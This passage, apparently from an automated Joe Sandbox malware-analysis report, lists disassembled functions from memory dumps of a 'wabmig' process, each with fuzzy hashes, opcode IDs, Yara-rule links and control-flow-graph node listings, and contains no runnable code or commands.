                                                              • Instruction Fuzzy Hash: 99C1AF75E00218CFEB14DFA5C944B9DBBB2FB88301F2481A9D809AB395DB359E85CF50
                                                              Function 0094C147 Relevance: .2, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2e583713ec6e60d78a455777ca00b1611d5472cd1423aeeea2c1025be95caa5
                                                              • Instruction ID: cf875491da823c97431bba6da79f8e380cee8fcc89f6ecec4872b51a2e481e1a
                                                              • Opcode Fuzzy Hash: f2e583713ec6e60d78a455777ca00b1611d5472cd1423aeeea2c1025be95caa5
                                                              • Instruction Fuzzy Hash: D4A1E5B5E05258DFDB54DFA9D884A9DBBF2BF89300F14806AE409EB362DB749841CF50
                                                              Function 25D42DC8 Relevance: .2, Instructions: 220COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad5e27365d485c78c44040d645ebbec07673e9e86a4587360b15db859b1333ff
                                                              • Instruction ID: 7b61bfbd6c39627196b5a0647eb7dbd1d9247f7ad5f7b2f892fe2e261b5c9314
                                                              • Opcode Fuzzy Hash: ad5e27365d485c78c44040d645ebbec07673e9e86a4587360b15db859b1333ff
                                                              • Instruction Fuzzy Hash: EFA1F470E002088FEB10DFA9C944B9DBBB1FF89314F208269E509BB3A1DB759985CF55
                                                              Function 25D42DBE Relevance: .2, Instructions: 220COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 770ec255e90d79e80ee06a7bc770955135a195bbdfb1c6334acc838d943fb3c3
                                                              • Instruction ID: 03c49b538f3ea01e9a96a9d1c2a20bb903b136f968199b94b60717228b2fde1e
                                                              • Opcode Fuzzy Hash: 770ec255e90d79e80ee06a7bc770955135a195bbdfb1c6334acc838d943fb3c3
                                                              • Instruction Fuzzy Hash: ACA1F470E002088FEB10DFA9C984B9DBBB1FF89314F208269E509BB391DB759985CF54
                                                              Function 25D4310E Relevance: .2, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21a96edb9a9558686aa9ca7ad18c53c8cad8c5566db4a6a2a4b7b3515facd5f5
                                                              • Instruction ID: 71280ee6bda434406b3635ae9efad60a75b9bdfb024e2da36aef64e60c15d097
                                                              • Opcode Fuzzy Hash: 21a96edb9a9558686aa9ca7ad18c53c8cad8c5566db4a6a2a4b7b3515facd5f5
                                                              • Instruction Fuzzy Hash: 0D91E470E00208CFEB10DFA9D884B9DBBB5FF89310F208259E509BB291DB759985CF55
                                                              Function 0094D278 Relevance: .2, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe0167eed24efaf584c00a89dde18ad16d1861a434149bff796e5e7631915b8e
                                                              • Instruction ID: 9c2f9f1365988b339c15df39236110c6e63d783f45d3abed5136b763df82d19d
                                                              • Opcode Fuzzy Hash: fe0167eed24efaf584c00a89dde18ad16d1861a434149bff796e5e7631915b8e
                                                              • Instruction Fuzzy Hash: D881A4B5E01218CFEB14DFAAD984B9DBBF2BF89304F248069E419AB365DB345945CF10
                                                              Function 0094CA08 Relevance: .2, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33e5789a33fcca84c4d4241440bf259121e04d493eb64f9871a87fb448028f16
                                                              • Instruction ID: 6d0d736ff2b45d1b74ffa063436384ed77a6fcd75a21969f158c06f506e48279
                                                              • Opcode Fuzzy Hash: 33e5789a33fcca84c4d4241440bf259121e04d493eb64f9871a87fb448028f16
                                                              • Instruction Fuzzy Hash: 6B8193B4E01218CFEB54DFAAD884A9DBBF2BF88301F14C069E419AB365DB345941CF50
                                                              Function 0094CCD8 Relevance: .2, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03090a23cf69d7fa6bfd66e514bcbdb0173ea9b7cc178e70a8f759c256f0e145
                                                              • Instruction ID: b46f8667c8315d446686d9633cfee00edc1028c3b7dbb9503cb4219796a72478
                                                              • Opcode Fuzzy Hash: 03090a23cf69d7fa6bfd66e514bcbdb0173ea9b7cc178e70a8f759c256f0e145
                                                              • Instruction Fuzzy Hash: DF81A3B4E01218DFEB54DFA9D884A9DBBF2BF88300F24C069E419AB365DB345985CF50
                                                              Function 0094C738 Relevance: .2, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e971aa9e88719733d0f9681d72a9c48565dbd36ce2594b4b62ed343a7f864139
                                                              • Instruction ID: 766beebe066cff79659b96cb088a9d40fb65439cc6e6b454796191cfc0d8381c
                                                              • Opcode Fuzzy Hash: e971aa9e88719733d0f9681d72a9c48565dbd36ce2594b4b62ed343a7f864139
                                                              • Instruction Fuzzy Hash: AE8192B5E01218DFEB54DFA9D984B9DBBF2BF88300F248069E419AB365DB345941CF50
                                                              Function 0094CFA9 Relevance: .2, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc4fc034469609fc7a1396b740f2202fa9d6035b79b754021916d6ff60e66763
                                                              • Instruction ID: efa7d19e5d1e59b26d9ba11d46232a5890159cb3fadb788c5f7a8ddef4936f4e
                                                              • Opcode Fuzzy Hash: fc4fc034469609fc7a1396b740f2202fa9d6035b79b754021916d6ff60e66763
                                                              • Instruction Fuzzy Hash: FD81A374E05218CFEB18DFA9D984B9DBBF2BF89300F148069E819AB365DB345945DF10
                                                              Function 00945370 Relevance: .2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ed7f353823903bfae75c63f173482ea40e41433c4c0e9d0b8c44113526f60bc
                                                              • Instruction ID: f0e29454f316427138ede4cb9923bc46293640fa7f4586f848fad817c9f3ecf7
                                                              • Opcode Fuzzy Hash: 3ed7f353823903bfae75c63f173482ea40e41433c4c0e9d0b8c44113526f60bc
                                                              • Instruction Fuzzy Hash: 4161C375E006189FDB14DFEAD984A9DBBF2BF88300F15C069E818AB366DB349941CF10
                                                              Function 0094E988 Relevance: .1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c239c4212ecbee37f8df393c61a4012720df0c874d8906eee0ff9e402b10d807
                                                              • Instruction ID: 192f6f4f9563b4901eb06df5058a251fdce1319330e581a220396288049f8aa8
                                                              • Opcode Fuzzy Hash: c239c4212ecbee37f8df393c61a4012720df0c874d8906eee0ff9e402b10d807
                                                              • Instruction Fuzzy Hash: 2E519375E00208DFEB18DFAAD894A9DBBB2FF89301F24C129E815AB364DB345841CF14
                                                              Function 0094E97B Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e75946c50f05907345839c866b73231ff158751c791dfb0cd359c0e1f3232449
                                                              • Instruction ID: 1e4900e1c1c539bd5ea0b06209e60838926b81118e466cc4ef3253ac02b30020
                                                              • Opcode Fuzzy Hash: e75946c50f05907345839c866b73231ff158751c791dfb0cd359c0e1f3232449
                                                              • Instruction Fuzzy Hash: DE519575E00208DFEB18DFAAD894A9DBBB2FF89701F24C129E815AB365DB345841CF14
                                                              Function 25D4992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1236 25d4992c 1237 25d499eb-25d499fc 1236->1237 1238 25d49a03-25d49a0c 1237->1238 1239 25d499fe 1237->1239 1241 25d49a12-25d49a25 1238->1241 1242 25d497e3-25d49808 1238->1242 1239->1238 1245 25d49a27 1241->1245 1246 25d49a2c-25d49a47 1241->1246 1243 25d4980f-25d49846 1242->1243 1244 25d4980a 1242->1244 1254 25d4984d-25d4987f 1243->1254 1255 25d49848 1243->1255 1244->1243 1245->1246 1247 25d49a4e-25d49a62 1246->1247 1248 25d49a49 1246->1248 1252 25d49a64 1247->1252 1253 25d49a69-25d49a7f LdrInitializeThunk 1247->1253 1248->1247 1252->1253 1256 25d49a81-25d49b7e 1253->1256 1261 25d49881-25d498a6 1254->1261 1262 25d498e3-25d498f6 1254->1262 1255->1254 1259 25d49b86-25d49b90 1256->1259 1260 25d49b80-25d49b85 1256->1260 1260->1259 1266 25d498ad-25d498db 1261->1266 1267 25d498a8 1261->1267 1264 25d498fd-25d49922 1262->1264 1265 25d498f8 1262->1265 1270 25d49924-25d49925 1264->1270 1271 25d49931-25d49969 1264->1271 1265->1264 1266->1262 1267->1266 1270->1241 1272 25d49970-25d499d1 call 25d49328 1271->1272 1273 25d4996b 1271->1273 1279 25d499d3 1272->1279 1280 25d499d8-25d499ea 1272->1280 1273->1272 1279->1280 1280->1237
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 25D49A6E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3409695c5444bf68846d9913ce13e3b04d40725f7b8e567ddc23462724aaf38d
                                                              • Instruction ID: 923650695369999d185a29ce5c6e18b02665c5e3093ce5a8661c9d73d1a94746
                                                              • Opcode Fuzzy Hash: 3409695c5444bf68846d9913ce13e3b04d40725f7b8e567ddc23462724aaf38d
                                                              • Instruction Fuzzy Hash: 05112974E002198FDB04DBAAD885EADB7F9FB88304F148169E848E7346D731AD41CB60
                                                              Function 009462F0 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1359 9462f0-946316 1361 946318-946325 1359->1361 1362 94633b-946348 1359->1362 1366 946337-946339 1361->1366 1367 946327-946335 1361->1367 1365 94634a-946354 1362->1365 1370 946356-946364 1365->1370 1371 94637c 1365->1371 1366->1365 1367->1365 1376 946366-94636a 1370->1376 1377 946371-94637a 1370->1377 1383 94637e call 946498 1371->1383 1384 94637e call 946488 1371->1384 1373 946384-946388 1374 9463a1-9463a5 1373->1374 1375 94638a-94639f 1373->1375 1378 9463a7-9463bc 1374->1378 1379 9463c3-9463c9 1374->1379 1375->1379 1376->1377 1377->1371 1378->1379 1383->1373 1384->1373
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P"
                                                              • API String ID: 0-36892166
                                                              • Opcode ID: 8cb5c8d47131aac2ab29dc8c5b666935ecc7ad2b611aed91089601e3d03dab57
                                                              • Instruction ID: 723993b52a398fea06fb6973a84b006691238356350cc695e55724f8699c6789
                                                              • Opcode Fuzzy Hash: 8cb5c8d47131aac2ab29dc8c5b666935ecc7ad2b611aed91089601e3d03dab57
                                                              • Instruction Fuzzy Hash: 1D2143363046528FC7299F29C46892EBBA6AFCA751714856DE806CB394CF35CC028B81
                                                              Function 0094F31B Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1385 94f31b-94f31d 1386 94f31f-94f33b 1385->1386 1387 94f2e9-94f302 1385->1387 1388 94f342-94f395 1386->1388 1389 94f33d 1386->1389 1390 94f304 1387->1390 1391 94f309-94f30b 1387->1391 1397 94f397 1388->1397 1398 94f39c-94f3a3 1388->1398 1389->1388 1390->1391 1397->1398 1399 94f3ae 1398->1399 1400 94f3b8-94f3ee 1399->1400
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c"8c"dc"
                                                              • API String ID: 0-2109075657
                                                              • Opcode ID: edaafe189461f361e2ac53b84bff3c9bf9fda43347fb3079e74d89ed10d63e17
                                                              • Instruction ID: 0c7ebc73434314679bd74416d1cc4b580a1d0241f5b216ed4d3de1fc60cae4f6
                                                              • Opcode Fuzzy Hash: edaafe189461f361e2ac53b84bff3c9bf9fda43347fb3079e74d89ed10d63e17
                                                              • Instruction Fuzzy Hash: F2218E71E00209DFDB01EFB8D850B9DBFB1FB85300F0085A9D4189B2A5EB744A45DF81
                                                              Function 0094F320 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1403 94f320-94f33b 1404 94f342-94f395 1403->1404 1405 94f33d 1403->1405 1411 94f397 1404->1411 1412 94f39c-94f3ae 1404->1412 1405->1404 1411->1412 1414 94f3b8-94f3ee 1412->1414
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c"8c"dc"
                                                              • API String ID: 0-2109075657
                                                              • Opcode ID: 169d41dfc843b1560c3c16a260a9f3789fbbea08d9e755f7c87881ad1b2109e8
                                                              • Instruction ID: 1311929eb417a741ca6f517beebec5d99160d9e35964a821b8ce508512b198e9
                                                              • Opcode Fuzzy Hash: 169d41dfc843b1560c3c16a260a9f3789fbbea08d9e755f7c87881ad1b2109e8
                                                              • Instruction Fuzzy Hash: EB110A71E00209DFEB04EFA8D950B9EBFF6FB84301F10C5A9D018AB255EB749A459F81
                                                              Function 0094E007 Relevance: .7, Instructions: 654COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d8083bee645ef7f10b3e0c1387e631c3648ee15884329f6b37eb99d9b63b101
                                                              • Instruction ID: c586d4fa7562d8ec050fc49c145bdb29672f6e5beffb3e49de74716a6e1dd830
                                                              • Opcode Fuzzy Hash: 1d8083bee645ef7f10b3e0c1387e631c3648ee15884329f6b37eb99d9b63b101
                                                              • Instruction Fuzzy Hash: 8912A9B65A53568FD3402F74D5BC06A7E62FB4F323705AE20E98BC2059DF7A0448CBA5
                                                              Function 0094E018 Relevance: .6, Instructions: 647COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1773 94e018-94e022 1774 94e024 1773->1774 1775 94e029-94e0a7 call 94e8e8 call 94f3f1 1773->1775 1774->1775 2097 94e0a8 call 25d40b30 1775->2097 2098 94e0a8 call 25d40b2f 1775->2098 1794 94e0ae 2099 94e0af call 25d417a0 1794->2099 2100 94e0af call 25d4178f 1794->2100 1795 94e0b5 2101 94e0b6 call 25d41e80 1795->2101 2102 94e0b6 call 25d41e70 1795->2102 1796 94e0bc 2103 94e0bd call 25d42915 1796->2103 2104 94e0bd call 25d428d5 1796->2104 2105 94e0bd call 25d42911 1796->2105 2106 94e0bd call 25d428d1 1796->2106 2107 94e0bd call 25d428dd 1796->2107 2108 94e0bd call 25d42919 1796->2108 2109 94e0bd call 25d428d9 1796->2109 2110 94e0bd call 25d4295a 1796->2110 2111 94e0bd call 25d42905 1796->2111 2112 94e0bd call 25d428c5 1796->2112 2113 94e0bd call 25d42901 1796->2113 2114 94e0bd call 25d428c1 1796->2114 2115 94e0bd call 25d4290d 1796->2115 2116 94e0bd call 25d428cd 1796->2116 2117 94e0bd call 25d42909 1796->2117 2118 94e0bd call 25d428c9 1796->2118 2119 94e0bd call 25d428f5 1796->2119 2120 94e0bd call 25d428f1 1796->2120 2121 94e0bd call 25d428fd 1796->2121 2122 94e0bd call 25d428bd 1796->2122 2123 94e0bd call 25d428f9 1796->2123 2124 94e0bd call 25d428e5 1796->2124 2125 94e0bd call 25d428e1 1796->2125 2126 94e0bd call 25d428ed 1796->2126 2127 94e0bd call 25d42968 1796->2127 2128 94e0bd call 25d428e9 1796->2128 1797 94e0c3-94e8db 2094 94e8e2-94e8e5 1797->2094 2097->1794 2098->1794 2099->1795 2100->1795 2101->1796 2102->1796 2103->1797 2104->1797 2105->1797 2106->1797 2107->1797 2108->1797 2109->1797 2110->1797 2111->1797 2112->1797 2113->1797 2114->1797 2115->1797 2116->1797 2117->1797 2118->1797 2119->1797 2120->1797 2121->1797 2122->1797 2123->1797 2124->1797 2125->1797 2126->1797 2127->1797 2128->1797
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3271aa3e666f7e450720ba3a6155b62bbbcf88bded36844c64e5372c7c0b44dc
                                                              • Instruction ID: 1cd91e20c443bd10eeb47e5735a0a92e582b303f0d9bacc902c2be458f616977
                                                              • Opcode Fuzzy Hash: 3271aa3e666f7e450720ba3a6155b62bbbcf88bded36844c64e5372c7c0b44dc
                                                              • Instruction Fuzzy Hash: 7F12A9B64A57578F93402F74D5BC06A7E62FB4F323705AE20E98BC2059DF7A0448CBA5
                                                              Function 00940C8F Relevance: .5, Instructions: 546COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2129 940c8f-940cc0 2131 940cc7-940cdd call 940780 2129->2131 2132 940cc2 2129->2132 2135 940ce2 2131->2135 2132->2131 2136 940cee-94104e call 940780 * 13 2135->2136 2210 941056-94105f 2136->2210 2307 941062 call 942790 2210->2307 2308 941062 call 9427f0 2210->2308 2211 941068-94107d 2310 941080 call 943cc0 2211->2310 2311 941080 call 943cbf 2211->2311 2213 941086-94108f 2312 941092 call 9441a0 2213->2312 2313 941092 call 943e13 2213->2313 2214 941098-9410c2 2217 9410cb 2214->2217 2316 9410ce call 945370 2217->2316 2317 9410ce call 945362 2217->2317 2218 9410d4-9410fe 2221 941107-94110a call 94c147 2218->2221 2222 941110-94113a 2221->2222 2225 941143 2222->2225 2226 94114c-941176 2225->2226 2229 94117f-941182 call 94c738 2226->2229 2230 941188-9411b2 2229->2230 2233 9411bb-9411be call 94ca08 2230->2233 2234 9411c4-9411f7 2233->2234 2237 941203-941209 call 94ccd8 2234->2237 2238 94120f-94124b 2237->2238 2241 941257-94125d call 94cfa9 2238->2241 2242 941263-94129f 2241->2242 2245 9412ab-9412b1 call 94d278 2242->2245 2246 9412b7-9413d2 2245->2246 2259 9413de-9413ea 2246->2259 2332 9413f0 call 945370 2259->2332 2333 9413f0 call 945362 2259->2333 2260 9413f6-94145c 2265 941467-941473 call 94d548 2260->2265 2266 941479-941485 2265->2266 2267 941490-94149c call 94d548 2266->2267 2268 9414a2-9414ae 2267->2268 2269 9414b9-9414c5 call 94d548 2268->2269 2270 9414cb-9414d7 2269->2270 2271 9414e2-9414ee call 94d548 2270->2271 2272 9414f4-941500 2271->2272 2273 94150b-941517 call 94d548 2272->2273 2274 94151d-941529 2273->2274 2275 941534-941540 call 94d548 2274->2275 2276 941546-941552 2275->2276 2277 94155d-941569 call 94d548 2276->2277 2278 94156f-94158c 2277->2278 2280 941597-9415a3 call 94d548 2278->2280 2281 9415a9-9415b5 2280->2281 2282 9415c0-9415cc call 94d548 2281->2282 2283 9415d2-9415de 2282->2283 2284 9415e9-9415f5 call 94d548 2283->2284 2285 9415fb-941607 2284->2285 2286 941612-94161e call 94d548 2285->2286 2287 941624-941630 2286->2287 2288 94163b-941647 call 94d548 2287->2288 2289 94164d-941659 2288->2289 2290 941664-941670 call 94d548 2289->2290 2291 941676-941682 2290->2291 2292 94168d-941699 call 94d548 2291->2292 2293 94169f-9416ab 2292->2293 2294 9416b6-9416c2 call 94d548 2293->2294 2295 9416c8-9416d4 2294->2295 2296 9416df-9416eb call 94d548 2295->2296 2297 9416f1-9417aa 2296->2297 2307->2211 2308->2211 2310->2213 2311->2213 2312->2214 2313->2214 2316->2218 2317->2218 2332->2260 2333->2260
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10afa8fce904b511a5ea46bba650837187a3d99623eb552c7f2306b6aee5743a
                                                              • Instruction ID: 51df22cefd7e1e052ea0f295df204537a6466effe936ca7d3d00f64f9858e9a2
                                                              • Opcode Fuzzy Hash: 10afa8fce904b511a5ea46bba650837187a3d99623eb552c7f2306b6aee5743a
                                                              • Instruction Fuzzy Hash: DC52D975A10219CFCB54EF68DD95B9DBBB2FB98301F1086A9D809A7364DB346D81CF80
                                                              Function 00940CA0 Relevance: .5, Instructions: 539COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2339 940ca0-940cc0 2340 940cc7-94105f call 940780 * 14 2339->2340 2341 940cc2 2339->2341 2523 941062 call 942790 2340->2523 2524 941062 call 9427f0 2340->2524 2341->2340 2420 941068-94107d 2526 941080 call 943cc0 2420->2526 2527 941080 call 943cbf 2420->2527 2422 941086-94108f 2528 941092 call 9441a0 2422->2528 2529 941092 call 943e13 2422->2529 2423 941098-9410cb 2532 9410ce call 945370 2423->2532 2533 9410ce call 945362 2423->2533 2427 9410d4-9413ea call 94c147 call 94c738 call 94ca08 call 94ccd8 call 94cfa9 call 94d278 2516 9413f0 call 945370 2427->2516 2517 9413f0 call 945362 2427->2517 2469 9413f6-9416eb call 94d548 * 16 2506 9416f1-9417aa 2469->2506 2516->2469 2517->2469 2523->2420 2524->2420 2526->2422 2527->2422 2528->2423 2529->2423 2532->2427 2533->2427
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51495fa2fd3336ca4151b1d79c4d2abb497608d59bc029dd5ffcebcccc3bd01e
                                                              • Instruction ID: 15f764acc3a29745c48c7baf287121f1217fd138901bdff85eb3b5954600bba2
                                                              • Opcode Fuzzy Hash: 51495fa2fd3336ca4151b1d79c4d2abb497608d59bc029dd5ffcebcccc3bd01e
                                                              • Instruction Fuzzy Hash: 3052D975A10219CFCB54EF68DD95B9DBBB2FB98301F1086A9D809A7364DB346D81CF80
                                                              Function 0094A4E1 Relevance: .5, Instructions: 455COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29c3d10db632c0ffeaea922efc58aba6e3367c7d85bc4a0d67443e395fee2f1b
                                                              • Instruction ID: b99b95e19b162688571f02596b41ccf883ab36e66d6cc2c952ce44387ed163ca
                                                              • Opcode Fuzzy Hash: 29c3d10db632c0ffeaea922efc58aba6e3367c7d85bc4a0d67443e395fee2f1b
                                                              • Instruction Fuzzy Hash: 71125C35A4020ADFCB15CFA8C684EAEBBB6FF88310F158555E4059B3A5D734ED81CB62
                                                              Function 0094791D Relevance: .3, Instructions: 333COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
